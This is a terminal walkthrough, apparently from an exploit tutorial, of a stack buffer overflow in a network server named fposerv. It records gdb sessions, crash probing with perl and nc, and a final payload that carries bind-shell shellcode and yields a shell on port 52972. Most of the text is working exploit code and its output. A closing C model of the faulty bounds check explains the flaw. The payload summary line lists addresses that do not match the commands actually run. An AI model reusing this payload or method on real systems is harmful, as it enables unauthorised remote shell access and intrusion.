bugs@linux:~$ gcc -o fposerv fposerv.c
bugs@linux:~$ ./fposerv
Usage: ./fposerv port
bugs@linux:~$ gdb fposerv
GNU gdb 6.5
Copyright (C) 2006 Free Software Foundation, Inc.
(gdb) break main
断点 1 位于 0x8048673
(gdb) disas vuln
汇编代码:
0x080485da:  push %ebp
0x080485db:  mov %esp,%ebp
0x080485dd:  sub $0x428,%esp
0x080485e3:  movl $0x0,0xfffffbe4(%ebp)
0x080485ed:  sub $0x4,%esp
0x080485f0:  push $0x400
0x080485f5:  push $0x0
0x080485f7:  lea 0xfffffbf8(%ebp),%eax
0x080485fd:  push %eax
0x080485fe:  call 0x80484a8
0x08048603:  add $0x10,%esp
0x08048606:  sub $0xc,%esp
0x08048609:  pushl 0x8(%ebp)
0x0804860c:  call 0x8048448
0x08048611:  add $0x10,%esp
0x08048614:  cmp $0x40c,%eax
0x08048619:  ja 0x8048648
0x0804861b:  mov 0x8(%ebp),%eax
0x0804861e:  cmpb $0x0,(%eax)
0x08048621:  je 0x804866b
0x08048623:  mov 0xfffffbe4(%ebp),%eax
0x08048629:  lea 0xfffffff8(%ebp),%edx
0x0804862c:  add %edx,%eax
0x0804862e:  lea 0xfffffc00(%eax),%edx
0x08048634:  mov 0x8(%ebp),%eax
0x08048637:  incl 0x8(%ebp)
0x0804863a:  mov (%eax),%al
0x0804863c:  mov %al,(%edx)
0x0804863e:  lea 0xfffffbe4(%ebp),%eax
0x08048644:  incl (%eax)
0x08048646:  jmp 0x804861b
0x08048648:  sub $0xc,%esp
0x0804864b:  pushl 0x8(%ebp)
0x0804864e:  call 0x8048448
0x08048653:  add $0x10,%esp
0x08048656:  cmp $0x40c,%eax
0x0804865b:  ja 0x804866b
0x0804865d:  sub $0xc,%esp
0x08048660:  pushl 0xc(%ebp)
0x08048663:  call 0x80485b4
0x08048668:  add $0x10,%esp
0x0804866b:  leave
0x0804866c:  ret
结束汇编。
(gdb) break *vuln+145
Breakpoint 2 at 0x804866b
(gdb) r 5555
Starting program: /home/bugs/fposerv 5555
断点 1, 0x08048673 位于 main ()
(gdb) x/x $ebp
0xbffff4c8: 0xbffff4e8
(gdb) x/x $ebp+4
0xbffff4cc: 0x4004728b
(gdb) c
Continuing.
[Terminal #2]
bugs@linux:~$ perl -e 'print "\x44\x43\x42\x41" x 259' | nc localhost 5555
[Terminal #1]
Breakpoint 2, 0x0804866b 位于 vuln ()
(gdb) c
Continuing.
程序接收信号SIGSEGV,线段故障。
0x08048825 位于 readsock ()
(gdb) i r
eax 0xbffff05c -1073745828
ecx 0x0 0
edx 0xbfffec3b -1073746885
ebx 0x4015bff0 1075167216
esp 0xbfffec44 0xbfffec44
ebp 0x41424344 0x41424344
esi 0xbffff520 -1073744608
edi 0x2 2
eip 0x8048825 0x8048825
eflags 0x10296 [ PF AF SF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
(gdb) x/12x $esp
0xbfffec44: 0x00000007 0x00000800 0x00000000 0x41424344
0xbfffec54: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffec64: 0x41424344 0x41424344 0x41424344 0x41424344
(gdb) x/x 0xbfffec50
0xbfffec50: 0x41424344
(gdb) c
Continuing.
程序接收信号SIGSEGV,线段故障。
程序不在存在。
(gdb) r 5555
启动程序:/home/bugs/fposerv 5555
断点 1, 0x08048673 位于 main ()
(gdb) c
Continuing.
[Terminal #2]
bugs@linux:~$ perl -e 'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" .
"\x44\x43\x42\x41" x 254 . "\x50\xec\xff\xbf"' | nc localhost 5555
[Terminal #1]
断点 2, 0x0804866b 位于 vuln ()
(gdb) c
Continuing.
程序接收信号SIGSEGV,线段故障。
0x41414141 位于 ?? ()
(gdb) x/x 0xbfffec50
0xbfffec50: 0x41414141
(gdb) x/x 0xbfffec60
0xbfffec60: 0x41424344
(gdb) c
Continuing.
程序接收信号SIGSEGV,线段故障。
程序不在存在。
(gdb) r 5555
启动程序:/home/bugs/fposerv 5555
断点 1, 0x08048673 位于 main ()
(gdb) c
Continuing.
[Terminal #2]
bugs@linux:~$ perl -e 'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" .
"\x44\x43\x42\x41" x 254 . "\x60\xec\xff\xbf"' | nc localhost 5555
[Terminal #1]
程序接收信号SIGSEGV,线段故障。
0x41424344 位于 ?? ()
(gdb) c
Continuing.
程序接收信号SIGSEGV,线段故障。
程序不在存在。
(gdb)
[Terminal #2]
bugs@linux:~$ pcalc 254*4        (space previously filled with the buffer address)
1016 0x3f8 0y1111111000
bugs@linux:~$ pcalc 1016-800     (minus the nops)
216 0xd8 0y11011000
bugs@linux:~$ pcalc 216-84       (minus the shellcode)
132 0x84 0y10000100
bugs@linux:~$ pcalc 132/4        (space for the new return addresses)
33 0x21 0y100001
bugs@linux:~$
[Terminal #1]
(gdb) r 5555
Starting program: /home/bugs/fposerv 5555
断点 1, 0x08048673 位于 main ()
(gdb) c
Continuing.
[Terminal #2]
bugs@linux:~$ perl -e 'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" .
"\x44\x43\x42\x41" x 33 . "\x90" x 800 .
"\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x43\x68\xff\x02\xce\xec\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
. "\x60\xec\xff\xbf"' | nc localhost 5555
[Terminal #1]
断点 2, 0x0804866b 位于 vuln ()
(gdb) c
Continuing.
程序接收信号SIGSEGV,线段故障。
0x41424344 位于 ?? ()
(gdb) x/250x $esp
0xbfffec68: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffec78: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffec88: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffec98: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffeca8: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffecb8: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffecc8: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffecd8: 0x41424344 0x41424344 0x41424344 0x90909090
0xbfffece8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffecf8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed08: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed18: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed28: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed38: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed48: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed58: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed68: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed78: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed88: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed98: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeda8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffedb8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffedc8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffedd8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffede8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffedf8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee08: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee18: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee28: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee38: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee48: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee58: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee68: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee78: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee88: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee98: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeea8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeeb8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeec8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeed8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeee8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeef8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef08: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef18: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef28: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef38: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef48: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef58: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef68: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef78: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef88: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef98: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffefa8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffefb8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffefc8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffefd8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffefe8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeff8: 0x90909090 0x90909090 0x90909090 0x6a58666a
0xbffff008: 0x52995b01 0x89026a53 0x5280cde1 0x02ff6843
0xbffff018: 0xe189ecce 0x5051106a 0xc689e189 0x80cd66b0
0xbffff028: 0x66b04343 0x565280cd 0xb043e189 0x8980cd66
0xbffff038: 0xb0c389d9 0x80cd493f 0x52f8e241 0x732f6e68
0xbffff048: 0x2f2f6868 0xe3896962
(gdb) d
Delete all breakpoints? (y or n) y
(gdb) r 5555
启动程序:/home/bugs/fposerv 5555
[Terminal #2]
Breakdown of the final payload:
padding -> saved ebp of _init -> return address of main() -> target eip -> nops -> shellcode -> buffer address
[A * 8] -> [\xe8\xf0\xff\xbf] -> [\x8b\x72\x04\x40] -> [\x08\xee\xff\xbf * 33] -> [\x90 * 800] -> [\x6a.....\x80] -> [\x90\xec\xff\xbf]
8 bytes     4 bytes                4 bytes                132 bytes                  800 bytes        84 bytes             4 bytes
Total payload size: 1036 bytes
bugs@linux:~$ perl -e 'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" .
"\x08\xee\xff\xbf" x 33 . "\x90" x 800 .
"\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x43\x68\xff\x02\xce\xec\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
. "\x60\xec\xff\xbf"' | nc localhost 5555
[CTRL+C]
bugs@linux:~$ netstat -antp | grep 52972
tcp 0 0 0.0.0.0:52972 0.0.0.0:* LISTEN 7089/fposerv
bugs@linux:~$ nc localhost 52972
[Terminal #1]
程序接收信号SIGSEGV,Trace/breakpoint trap.
0x400007b0 in _start () from /lib/ld-linux.so.2
(gdb) c
Continuing.
[Terminal #2]
id
uid=1000(bugs) gid=100(users) groups=100(users)
exit
bugs@linux:~$
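As an added example (not fposerv.c, which the page never shows), here is a C model of the copy loop recovered from the vuln() disassembly above, run once under the binary's bound (0x40c) and once under a bound that respects the 0x400 buffer. The frame layout it assumes is read from the disassembly: buf at ebp-0x408, 8 bytes between buf and the frame base, saved ebp at ebp+0.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE      0x400           /* memset(buf, 0, 0x400) in vuln()        */
#define VULN_LIMIT    0x40c           /* cmp $0x40c,%eax: 12 bytes too generous */
#define SAVED_EBP_OFF (BUF_SIZE + 8)  /* buf at ebp-0x408, saved ebp at ebp+0   */
#define FRAME_SIZE    (SAVED_EBP_OFF + 4)
#define SAVED_EBP     0xbffff4e8u     /* the value x/x $ebp shows on the page   */

/* Flat byte model of vuln()'s frame: buf, 8 bytes above it, saved ebp.
 * The layout is an assumption read from the disassembly, not fposerv.c. */
struct frame { unsigned char bytes[FRAME_SIZE]; };

/* Mirrors the copy loop in vuln(): the only guard is strlen(src) > limit
 * (the 'ja' after the first strlen call), so an input of exactly `limit`
 * bytes is accepted, and the loop never compares i against BUF_SIZE.
 * The i < FRAME_SIZE stop only keeps this model in bounds. */
static size_t copy_with_check(struct frame *f, const char *src, size_t limit)
{
    size_t i = 0;
    if (strlen(src) > limit)
        return 0;                     /* rejected: nothing copied */
    while (src[i] != '\0' && i < FRAME_SIZE) {
        f->bytes[i] = (unsigned char)src[i];
        i++;
    }
    return i;
}

/* Builds a frame whose saved-ebp slot holds SAVED_EBP, feeds it a
 * constructed input of input_len 'A's under the given limit, and returns
 * 1 if the saved ebp survived, 0 if the copy overwrote it. */
int saved_ebp_survives(size_t input_len, size_t limit)
{
    struct frame f;
    char input[FRAME_SIZE + 1];
    uint32_t v = SAVED_EBP;
    if (input_len > FRAME_SIZE)
        input_len = FRAME_SIZE;
    memset(input, 'A', input_len);
    input[input_len] = '\0';
    memset(&f, 0, sizeof f);
    memcpy(f.bytes + SAVED_EBP_OFF, &v, sizeof v);
    copy_with_check(&f, input, limit);
    memcpy(&v, f.bytes + SAVED_EBP_OFF, sizeof v);
    return v == SAVED_EBP;
}
```

With the binary's limit, a 1036-byte input passes the check and lands on the saved ebp; with a limit of BUF_SIZE - 1 (leaving room for the terminator) the same input is rejected and the frame base is untouched.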
:: Questions. Comments. Concerns. --> HacK01[at]Live.cn ::
:: Hacker Netspy [Czy] ::